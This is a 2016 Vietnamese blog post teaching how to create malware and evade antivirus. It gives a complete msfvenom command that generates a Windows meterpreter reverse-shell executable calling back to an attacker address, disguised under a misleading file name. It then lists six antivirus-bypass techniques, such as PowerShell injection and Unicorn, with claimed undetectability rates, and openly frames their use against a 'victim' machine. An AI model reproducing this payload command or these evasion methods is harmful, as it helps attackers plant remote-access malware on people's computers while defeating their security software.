Friday, December 16, 2016

File mã độc bị Antivirus phát hiện? Cách tạo file mã độc Bypass Antivirus

Đăng bởi   vào   Bình luận

Xin chào các bạn

Việc tạo một file chương trình chứa mã độc là một việc làm CỰC KÌ dễ, chỉ cần chạy đoạn code này trên Kali thì sau khoảng 30s các bạn sẽ có ngay 1 file mã độc, cực kì thuận tiện đúng không nào
CODE: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=8080 -f exe > /root/Desktop/Privilege Escalation.exe

NHƯNG

Nếu đơn giản thế thì tôi khỏi phải viết bài này, cái đau đầu ở đây là File này vừa copy vô máy Victim, thằng cờ hó Antivirus (AV) nó đã nhảy ra nuốt sống


Thời bây giờ, 10 ông thì 8 ông xài Antivirus, chưa kể Windows 8.1 và Windows 10 được tích hợp sẵn trình diệt Virus mặc định Windows Defener

Đau não chưa

Vậy, làm sao để Bypass nó đây

Trên kênh Youtube của tôi đã có một số Video về vấn đề này, mời các bạn coi

Trước khi coi, các bạn hãy làm quen với thuật ngữ chỉ số FUD (Fully Undetectable) Chỉ số này càng cao thì khả năng bypass càng lớn

Tất cả các file mã độc dều được tôi kiểm tra bằng Virus Total

1. Sử dụng kĩ thuật PowerShell Injection, cách này là thực thi một đoạn mã độc Powershell trên máy victim. Tỉ lệ FUD (99%)


2. Sử dụng Unicorn. Cách này gần như tương tự cách 1 (Cũng là thực thi một đoạn mã độc Powershell trên máy victim. ). Tỉ lệ FUD (99%)



3. Sử dụng Reserve0x1. Tỉ lệ FUD (96%)


4. Kết hợp giữa Powershell Attack+ Apache2+ một chút về code . Tỉ lệ FUD (100%)



5. Sử dụng Python . Tỉ lệ FUD (96%)


6. Sử dụng Auto IT (Tỉ lệ FUD 80%)